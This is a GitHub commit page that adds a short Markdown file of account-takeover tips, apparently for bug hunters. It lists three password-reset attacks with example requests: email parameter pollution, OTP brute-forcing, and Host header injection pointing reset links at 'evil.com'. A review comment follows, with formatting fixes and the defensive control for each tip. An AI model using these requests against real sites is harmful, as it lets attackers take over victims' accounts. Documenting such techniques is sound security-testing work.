Account Takeover [1]

Create account takeover tips, and add 3 tips
Muhammad Daffa 2020-09-03 20:52:49 +07:00 committed by GitHub
parent 1222314a08
commit 4e7af26eb2
GPG Key ID: 4AEE18F83AFDEB23

24
AccountTakeover.md Normal file

@ -0,0 +1,24 @@
## Account Takeover
1. Parameter pollution in reset password
```
POST /reset
[...]
email=victim@mail.com&email=hacker@mail.com
```
2. Bruteforce the OTP code
```
POST /reset
[...]
email=victim@mail.com&code=$123456$
```
3. Host header Injection
```
POST /reset
Host: evil.com
[...]
email=victim@mail.com
```
And the victim will receive the reset link with your evil.com
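Review bot: the closing sentence of tip 3 (`And the victim will receive the reset link with your evil.com`) is a bare fragment placed directly after the fence with no blank line, so Markdown will not render it as part of list item 3; fold it into the item text, e.g. `3. Host header injection (the server builds the reset link from the Host header, so the victim receives a link pointing at the attacker's host)`, and add a blank line after each closing fence. The three fences are untagged (```http would give syntax highlighting for the request snippets), `$123456$` in tip 2 is never explained as a placeholder for the value being iterated and reads as a literal body, and "Host header Injection" has inconsistent capitalization against the other two headings. Since this file is the first entry in the repo on the topic, each tip would also be more useful with the one-line control that closes it: reject or take only the first `email` parameter on the server side (tip 1), rate-limit and lock out OTP verification attempts and use sufficiently long codes with short expiry (tip 2), and build reset links from a server-side configured base URL instead of the incoming `Host` header (tip 3).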